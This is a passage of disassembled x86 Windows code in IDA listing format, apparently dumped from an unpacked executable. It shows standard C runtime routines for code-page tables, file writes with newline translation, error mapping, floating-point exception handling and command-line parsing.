loc_41EAE6: ; CODE XREF: sub_41EAC6+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41EAFB
mov ds:dword_4CDA64, 1
jmp ds:dword_4241D0
; ---------------------------------------------------------------------------
loc_41EAFB: ; CODE XREF: sub_41EAC6+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41EB0F
mov eax, ds:dword_4CDA58
mov ds:dword_4CDA64, 1
locret_41EB0F: ; CODE XREF: sub_41EAC6+38�j
retn
sub_41EAC6 endp
; =============== S U B R O U T I N E =======================================
sub_41EB10 proc near ; CODE XREF: sub_41E92D+118�p
; sub_41E92D+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41EB3D
sub eax, 4
jz short loc_41EB37
sub eax, 0Dh
jz short loc_41EB31
dec eax
jz short loc_41EB2B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41EB2B: ; CODE XREF: sub_41EB10+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41EB31: ; CODE XREF: sub_41EB10+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41EB37: ; CODE XREF: sub_41EB10+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41EB3D: ; CODE XREF: sub_41EB10+9�j
mov eax, 411h
retn
sub_41EB10 endp
; =============== S U B R O U T I N E =======================================
sub_41EB43 proc near ; CODE XREF: sub_41E92D:loc_41EAB0�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4CEF00
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4CEDF0
mov ds:dword_4CEDE4, eax
mov ds:dword_4CEDFC, eax
mov ds:dword_4CF004, eax
stosd
stosd
stosd
pop edi
retn
sub_41EB43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB6C proc near ; CODE XREF: sub_41E92D:loc_41EAB5�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_4CEDE4
call ds:dword_4241CC ;; GetCPInfo
cmp eax, 1
jnz loc_41ECA5
xor eax, eax
mov esi, 100h
loc_41EB96: ; CODE XREF: sub_41EB6C+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41EB96
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41EBE7
push ebx
push edi
lea edx, [ebp+var_D]
loc_41EBB5: ; CODE XREF: sub_41EB6C+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41EBDC
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41EBDC: ; CODE XREF: sub_41EB6C+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41EBB5
pop edi
pop ebx
loc_41EBE7: ; CODE XREF: sub_41EB6C+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_4CF004
push ds:dword_4CEDE4
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_41FB63
push 0
lea eax, [ebp+var_214]
push ds:dword_4CEDE4
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_4CF004
call sub_41E709
push 0
lea eax, [ebp+var_314]
push ds:dword_4CEDE4
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_4CF004
call sub_41E709
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_41EC62: ; CODE XREF: sub_41EB6C+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41EC80
or ds:byte_4CEF01[eax], 10h
mov dl, [ebp+eax+var_214]
loc_41EC78: ; CODE XREF: sub_41EB6C+127�j
mov ds:byte_4CEE00[eax], dl
jmp short loc_41EC9C
; ---------------------------------------------------------------------------
loc_41EC80: ; CODE XREF: sub_41EB6C+FC�j
test dl, 2
jz short loc_41EC95
or ds:byte_4CEF01[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41EC78
; ---------------------------------------------------------------------------
loc_41EC95: ; CODE XREF: sub_41EB6C+117�j
and ds:byte_4CEE00[eax], 0
loc_41EC9C: ; CODE XREF: sub_41EB6C+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41EC62
jmp short loc_41ECEE
; ---------------------------------------------------------------------------
loc_41ECA5: ; CODE XREF: sub_41EB6C+1D�j
xor eax, eax
mov esi, 100h
loc_41ECAC: ; CODE XREF: sub_41EB6C+180�j
cmp eax, 41h
jb short loc_41ECCA
cmp eax, 5Ah
ja short loc_41ECCA
or ds:byte_4CEF01[eax], 10h
mov cl, al
add cl, 20h
loc_41ECC2: ; CODE XREF: sub_41EB6C+174�j
mov ds:byte_4CEE00[eax], cl
jmp short loc_41ECE9
; ---------------------------------------------------------------------------
loc_41ECCA: ; CODE XREF: sub_41EB6C+143�j
; sub_41EB6C+148�j
cmp eax, 61h
jb short loc_41ECE2
cmp eax, 7Ah
ja short loc_41ECE2
or ds:byte_4CEF01[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41ECC2
; ---------------------------------------------------------------------------
loc_41ECE2: ; CODE XREF: sub_41EB6C+161�j
; sub_41EB6C+166�j
and ds:byte_4CEE00[eax], 0
loc_41ECE9: ; CODE XREF: sub_41EB6C+15C�j
inc eax
cmp eax, esi
jb short loc_41ECAC
loc_41ECEE: ; CODE XREF: sub_41EB6C+137�j
pop esi
leave
retn
sub_41EB6C endp
; =============== S U B R O U T I N E =======================================
sub_41ECF1 proc near ; CODE XREF: sub_41F12F+9�p
; sub_41F187+D�p ...
cmp ds:dword_4CF034, 0
jnz short locret_41ED0C
push 0FFFFFFFDh
call sub_41E92D
pop ecx
mov ds:dword_4CF034, 1
locret_41ED0C: ; CODE XREF: sub_41ECF1+7�j
retn
sub_41ECF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED0D proc near ; CODE XREF: sub_4192B8+2B�p
; sub_4192B8+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_4CEDFC, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41ED31
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_418C10
add esp, 0Ch
jmp short loc_41ED94
; ---------------------------------------------------------------------------
loc_41ED31: ; CODE XREF: sub_41ED0D+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41ED76
mov ecx, [ebp+arg_4]
loc_41ED3C: ; CODE XREF: sub_41ED0D+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test ds:byte_4CEF01[esi], 4
mov [edi], al
jz short loc_41ED60
inc edi
inc ecx
test edx, edx
jz short loc_41ED6C
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41ED72
jmp short loc_41ED66
; ---------------------------------------------------------------------------
loc_41ED60: ; CODE XREF: sub_41ED0D+3E�j
inc edi
inc ecx
test al, al
jz short loc_41ED76
loc_41ED66: ; CODE XREF: sub_41ED0D+51�j
test edx, edx
jnz short loc_41ED3C
jmp short loc_41ED76
; ---------------------------------------------------------------------------
loc_41ED6C: ; CODE XREF: sub_41ED0D+44�j
and byte ptr [edi-1], 0
jmp short loc_41ED76
; ---------------------------------------------------------------------------
loc_41ED72: ; CODE XREF: sub_41ED0D+4F�j
and byte ptr [edi-2], 0
loc_41ED76: ; CODE XREF: sub_41ED0D+2A�j
; sub_41ED0D+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41ED91
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41ED91: ; CODE XREF: sub_41ED0D+6F�j
mov eax, [ebp+arg_0]
loc_41ED94: ; CODE XREF: sub_41ED0D+22�j
pop edi
pop ebp
retn
sub_41ED0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED97 proc near ; CODE XREF: sub_4196EF+A2�p
; sub_419D23+95�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, ds:dword_4CEDE0
push esi
push edi
jnb loc_41EF2B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:4CECE0h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41EF2B
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41EDE8
loc_41EDE1: ; CODE XREF: sub_41ED97+177�j
xor eax, eax
jmp loc_41EF3F
; ---------------------------------------------------------------------------
loc_41EDE8: ; CODE XREF: sub_41ED97+48�j
test al, 20h
jz short loc_41EDF8
push 2
push edi
push ecx
call sub_41E517
add esp, 0Ch
loc_41EDF8: ; CODE XREF: sub_41ED97+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41EEC7
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41EEFF
loc_41EE18: ; CODE XREF: sub_41ED97+F5�j
lea eax, [ebp+var_414]
loc_41EE1E: ; CODE XREF: sub_41ED97+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41EE52
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41EE3D
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41EE3D: ; CODE XREF: sub_41ED97+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_41EE1E
loc_41EE52: ; CODE XREF: sub_41ED97+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_42407C ;; WriteFile
test eax, eax
jz short loc_41EEBC
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41EE8E
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_41EE18
loc_41EE8E: ; CODE XREF: sub_41ED97+EA�j
; sub_41ED97+12E�j
xor edi, edi
loc_41EE90: ; CODE XREF: sub_41ED97+150�j
; sub_41ED97+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41EF26
cmp [ebp+arg_0], edi
jz short loc_41EEFF
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41EEF4
mov ds:dword_4CD9B4, 9
mov ds:dword_4CD9B8, eax
jmp loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EEBC: ; CODE XREF: sub_41ED97+E0�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41EE8E
; ---------------------------------------------------------------------------
loc_41EEC7: ; CODE XREF: sub_41ED97+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_42407C ;; WriteFile
test eax, eax
jz short loc_41EEE9
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41EE90
; ---------------------------------------------------------------------------
loc_41EEE9: ; CODE XREF: sub_41ED97+145�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41EE90
; ---------------------------------------------------------------------------
loc_41EEF4: ; CODE XREF: sub_41ED97+10F�j
push [ebp+arg_0]
call sub_41EF44
pop ecx
jmp short loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EEFF: ; CODE XREF: sub_41ED97+7B�j
; sub_41ED97+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41EF14
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_41EDE1
loc_41EF14: ; CODE XREF: sub_41ED97+16F�j
mov ds:dword_4CD9B4, 1Ch
mov ds:dword_4CD9B8, edi
jmp short loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EF26: ; CODE XREF: sub_41ED97+FE�j
sub eax, [ebp+var_10]
jmp short loc_41EF3F
; ---------------------------------------------------------------------------
loc_41EF2B: ; CODE XREF: sub_41ED97+15�j
; sub_41ED97+37�j
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
loc_41EF3C: ; CODE XREF: sub_41ED97+120�j
; sub_41ED97+166�j ...
or eax, 0FFFFFFFFh
loc_41EF3F: ; CODE XREF: sub_41ED97+4C�j
; sub_41ED97+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41ED97 endp
; =============== S U B R O U T I N E =======================================
sub_41EF44 proc near ; CODE XREF: sub_4197F9+16�p
; sub_419BBA+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov ds:dword_4CD9B8, ecx
mov eax, offset dword_436100
loc_41EF55: ; CODE XREF: sub_41EF44+1E�j
cmp ecx, [eax]
jz short loc_41EF79
add eax, 8
inc edx
cmp eax, offset dword_436268
jl short loc_41EF55
cmp ecx, 13h
jb short loc_41EF86
cmp ecx, 24h
ja short loc_41EF86
mov ds:dword_4CD9B4, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41EF79: ; CODE XREF: sub_41EF44+13�j
mov eax, ds:dword_436104[edx*8]
mov ds:dword_4CD9B4, eax
retn
; ---------------------------------------------------------------------------
loc_41EF86: ; CODE XREF: sub_41EF44+23�j
; sub_41EF44+28�j
cmp ecx, 0BCh
jb short loc_41EFA0
cmp ecx, 0CAh
mov ds:dword_4CD9B4, 8
jbe short locret_41EFAA
loc_41EFA0: ; CODE XREF: sub_41EF44+48�j
mov ds:dword_4CD9B4, 16h
locret_41EFAA: ; CODE XREF: sub_41EF44+5A�j
retn
sub_41EF44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFAB proc near ; CODE XREF: _0:00419CC7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_41F0EC
test eax, eax
pop ecx
jz loc_41F0E0
mov ebx, [eax+8]
test ebx, ebx
jz loc_41F0E0
cmp ebx, 5
jnz short loc_41EFDC
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41F0E9
; ---------------------------------------------------------------------------
loc_41EFDC: ; CODE XREF: sub_41EFAB+23�j
cmp ebx, 1
jz loc_41F0DB
mov ecx, ds:dword_4CDA68
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_4CDA68, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41F0CB
mov ecx, ds:dword_4362E0
mov edx, ds:dword_4362E4
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41F02B
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:436270h[esi*4]
loc_41F022: ; CODE XREF: sub_41EFAB+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41F022
loc_41F02B: ; CODE XREF: sub_41EFAB+69�j
mov eax, [eax]
mov esi, ds:dword_4362EC
cmp eax, 0C000008Eh
jnz short loc_41F046
mov ds:dword_4362EC, 83h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F046: ; CODE XREF: sub_41EFAB+8D�j
cmp eax, 0C0000090h
jnz short loc_41F059
mov ds:dword_4362EC, 81h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F059: ; CODE XREF: sub_41EFAB+A0�j
cmp eax, 0C0000091h
jnz short loc_41F06C
mov ds:dword_4362EC, 84h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F06C: ; CODE XREF: sub_41EFAB+B3�j
cmp eax, 0C0000093h
jnz short loc_41F07F
mov ds:dword_4362EC, 85h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F07F: ; CODE XREF: sub_41EFAB+C6�j
cmp eax, 0C000008Dh
jnz short loc_41F092
mov ds:dword_4362EC, 82h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F092: ; CODE XREF: sub_41EFAB+D9�j
cmp eax, 0C000008Fh
jnz short loc_41F0A5
mov ds:dword_4362EC, 86h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F0A5: ; CODE XREF: sub_41EFAB+EC�j
cmp eax, 0C0000092h
jnz short loc_41F0B6
mov ds:dword_4362EC, 8Ah
loc_41F0B6: ; CODE XREF: sub_41EFAB+99�j
; sub_41EFAB+AC�j ...
push ds:dword_4362EC
push 8
call ebx
pop ecx
mov ds:dword_4362EC, esi
pop ecx
pop esi
jmp short loc_41F0D3
; ---------------------------------------------------------------------------
loc_41F0CB: ; CODE XREF: sub_41EFAB+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41F0D3: ; CODE XREF: sub_41EFAB+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_4CDA68, eax
loc_41F0DB: ; CODE XREF: sub_41EFAB+34�j
or eax, 0FFFFFFFFh
jmp short loc_41F0E9
; ---------------------------------------------------------------------------
loc_41F0E0: ; CODE XREF: sub_41EFAB+F�j
; sub_41EFAB+1A�j
push [ebp+arg_4]
call ds:dword_42404C ;; UnhandledExceptionFilter
loc_41F0E9: ; CODE XREF: sub_41EFAB+2C�j
; sub_41EFAB+133�j
pop ebx
pop ebp
retn
sub_41EFAB endp
; =============== S U B R O U T I N E =======================================
sub_41F0EC proc near ; CODE XREF: sub_41EFAB+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_4362E8
cmp ds:dword_436268, edx
push esi
mov eax, offset dword_436268
jz short loc_41F119
lea esi, [ecx+ecx*2]
lea esi, ds:436268h[esi*4]
loc_41F10E: ; CODE XREF: sub_41F0EC+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41F119
cmp [eax], edx
jnz short loc_41F10E
loc_41F119: ; CODE XREF: sub_41F0EC+16�j
; sub_41F0EC+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:436268h[ecx*4]
cmp eax, ecx
jnb short loc_41F12C
cmp [eax], edx
jz short locret_41F12E
loc_41F12C: ; CODE XREF: sub_41F0EC+3A�j
xor eax, eax
locret_41F12E: ; CODE XREF: sub_41F0EC+3E�j
retn
sub_41F0EC endp
; =============== S U B R O U T I N E =======================================
sub_41F12F proc near ; CODE XREF: _0:00419C89�p
cmp ds:dword_4CF034, 0
jnz short loc_41F13D
call sub_41ECF1
loc_41F13D: ; CODE XREF: sub_41F12F+7�j
push esi
mov esi, ds:dword_4CF02C
mov al, [esi]
cmp al, 22h
jnz short loc_41F16F
loc_41F14A: ; CODE XREF: sub_41F12F+33�j
; sub_41F12F+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41F167
test al, al
jz short loc_41F167
movzx eax, al
push eax
call sub_42101D
test eax, eax
pop ecx
jz short loc_41F14A
inc esi
jmp short loc_41F14A
; ---------------------------------------------------------------------------
loc_41F167: ; CODE XREF: sub_41F12F+21�j
; sub_41F12F+25�j
cmp byte ptr [esi], 22h
jnz short loc_41F179
loc_41F16C: ; CODE XREF: sub_41F12F+52�j
inc esi
jmp short loc_41F179
; ---------------------------------------------------------------------------
loc_41F16F: ; CODE XREF: sub_41F12F+19�j
cmp al, 20h
jbe short loc_41F179
loc_41F173: ; CODE XREF: sub_41F12F+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41F173
loc_41F179: ; CODE XREF: sub_41F12F+3B�j
; sub_41F12F+3E�j ...
mov al, [esi]
test al, al
jz short loc_41F183
cmp al, 20h
jbe short loc_41F16C
loc_41F183: ; CODE XREF: sub_41F12F+4E�j
mov eax, esi
pop esi
retn
sub_41F12F endp
; =============== S U B R O U T I N E =======================================
sub_41F187 proc near ; CODE XREF: _0:00419C72�p
push ebx
xor ebx, ebx
cmp ds:dword_4CF034, ebx
push esi
push edi
jnz short loc_41F199
call sub_41ECF1
loc_41F199: ; CODE XREF: sub_41F187+B�j
mov esi, ds:dword_4CDA00
xor edi, edi
loc_41F1A1: ; CODE XREF: sub_41F187+30�j
mov al, [esi]
cmp al, bl
jz short loc_41F1B9
cmp al, 3Dh
jz short loc_41F1AC
inc edi
loc_41F1AC: ; CODE XREF: sub_41F187+22�j
push esi
call sub_417AB0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41F1A1
; ---------------------------------------------------------------------------
loc_41F1B9: ; CODE XREF: sub_41F187+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_4CD9DC, esi
jnz short loc_41F1DB
push 9
call sub_419CDA
pop ecx
loc_41F1DB: ; CODE XREF: sub_41F187+4A�j
mov edi, ds:dword_4CDA00
cmp [edi], bl
jz short loc_41F21E
push ebp
loc_41F1E6: ; CODE XREF: sub_41F187+94�j
push edi
call sub_417AB0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41F217
push ebp
call sub_417B89
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41F20A
push 9
call sub_419CDA
pop ecx
loc_41F20A: ; CODE XREF: sub_41F187+79�j
push edi
push dword ptr [esi]
call sub_4179C0
pop ecx
add esi, 4
pop ecx
loc_41F217: ; CODE XREF: sub_41F187+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_41F1E6
pop ebp
loc_41F21E: ; CODE XREF: sub_41F187+5C�j
push ds:dword_4CDA00
call sub_417C3B
pop ecx
mov ds:dword_4CDA00, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_4CF030, 1
pop ebx
retn
sub_41F187 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F240 proc near ; CODE XREF: _0:00419C6D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_4CF034, ebx
push esi
push edi
jnz short loc_41F257
call sub_41ECF1
loc_41F257: ; CODE XREF: sub_41F240+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:off_424094
mov eax, ds:dword_4CF02C
mov ds:off_4CD9EC, esi
mov edi, esi
cmp [eax], bl
jz short loc_41F27C
mov edi, eax
loc_41F27C: ; CODE XREF: sub_41F240+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_41F2D9
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_417B89
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41F2AC
push 8
call sub_419CDA
pop ecx
loc_41F2AC: ; CODE XREF: sub_41F240+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41F2D9
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_4CD9D4, esi
pop edi
pop esi
mov ds:dword_4CD9D0, eax
pop ebx
leave
retn
sub_41F240 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F2D9 proc near ; CODE XREF: sub_41F240+47�p
; sub_41F240+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41F303
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41F303: ; CODE XREF: sub_41F2D9+20�j
cmp byte ptr [eax], 22h
jnz short loc_41F34C
loc_41F308: ; CODE XREF: sub_41F2D9+58�j
; sub_41F2D9+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41F33A
test dl, dl
jz short loc_41F33A
movzx edx, dl
test ds:byte_4CEF01[edx], 4
jz short loc_41F32D
inc dword ptr [ecx]
test esi, esi
jz short loc_41F32D
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41F32D: ; CODE XREF: sub_41F2D9+46�j
; sub_41F2D9+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41F308
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41F308
; ---------------------------------------------------------------------------
loc_41F33A: ; CODE XREF: sub_41F2D9+36�j
; sub_41F2D9+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41F344
and byte ptr [esi], 0
inc esi
loc_41F344: ; CODE XREF: sub_41F2D9+65�j
cmp byte ptr [eax], 22h
jnz short loc_41F38F
inc eax
jmp short loc_41F38F
; ---------------------------------------------------------------------------
loc_41F34C: ; CODE XREF: sub_41F2D9+2D�j
; sub_41F2D9+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41F357
mov dl, [eax]
mov [esi], dl
inc esi
loc_41F357: ; CODE XREF: sub_41F2D9+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_4CEF01[ebx], 4
jz short loc_41F372
inc dword ptr [ecx]
test esi, esi
jz short loc_41F371
mov bl, [eax]
mov [esi], bl
inc esi
loc_41F371: ; CODE XREF: sub_41F2D9+91�j
inc eax
loc_41F372: ; CODE XREF: sub_41F2D9+8B�j
cmp dl, 20h
jz short loc_41F380
test dl, dl
jz short loc_41F384
cmp dl, 9
jnz short loc_41F34C
loc_41F380: ; CODE XREF: sub_41F2D9+9C�j
test dl, dl
jnz short loc_41F387
loc_41F384: ; CODE XREF: sub_41F2D9+A0�j
dec eax
jmp short loc_41F38F
; ---------------------------------------------------------------------------
loc_41F387: ; CODE XREF: sub_41F2D9+A9�j
test esi, esi
jz short loc_41F38F
and byte ptr [esi-1], 0
loc_41F38F: ; CODE XREF: sub_41F2D9+6E�j
; sub_41F2D9+71�j ...
and [ebp+arg_10], 0
loc_41F393: ; CODE XREF: sub_41F2D9+19E�j
cmp byte ptr [eax], 0
jz loc_41F47C
loc_41F39C: ; CODE XREF: sub_41F2D9+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41F3A8
cmp dl, 9
jnz short loc_41F3AB
loc_41F3A8: ; CODE XREF: sub_41F2D9+C8�j
inc eax
jmp short loc_41F39C
; ---------------------------------------------------------------------------
loc_41F3AB: ; CODE XREF: sub_41F2D9+CD�j
cmp byte ptr [eax], 0
jz loc_41F47C
test edi, edi
jz short loc_41F3C0
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41F3C0: ; CODE XREF: sub_41F2D9+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41F3C5: ; CODE XREF: sub_41F2D9+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41F3CE: ; CODE XREF: sub_41F2D9+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41F3D7
inc eax
inc ebx
jmp short loc_41F3CE
; ---------------------------------------------------------------------------
loc_41F3D7: ; CODE XREF: sub_41F2D9+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41F408
test bl, 1
jnz short loc_41F406
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41F3F5
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41F3F5
mov eax, edx
jmp short loc_41F3F8
; ---------------------------------------------------------------------------
loc_41F3F5: ; CODE XREF: sub_41F2D9+10D�j
; sub_41F2D9+116�j
mov [ebp+arg_0], edi
loc_41F3F8: ; CODE XREF: sub_41F2D9+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41F406: ; CODE XREF: sub_41F2D9+106�j
shr ebx, 1
loc_41F408: ; CODE XREF: sub_41F2D9+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41F41D
inc ebx
loc_41F410: ; CODE XREF: sub_41F2D9+142�j
test esi, esi
jz short loc_41F418
mov byte ptr [esi], 5Ch
inc esi
loc_41F418: ; CODE XREF: sub_41F2D9+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41F410
loc_41F41D: ; CODE XREF: sub_41F2D9+134�j
mov dl, [eax]
test dl, dl
jz short loc_41F46D
cmp [ebp+arg_10], 0
jnz short loc_41F433
cmp dl, 20h
jz short loc_41F46D
cmp dl, 9
jz short loc_41F46D
loc_41F433: ; CODE XREF: sub_41F2D9+14E�j
cmp [ebp+arg_0], 0
jz short loc_41F467
test esi, esi
jz short loc_41F456
movzx ebx, dl
test ds:byte_4CEF01[ebx], 4
jz short loc_41F44F
mov [esi], dl
inc esi
inc eax
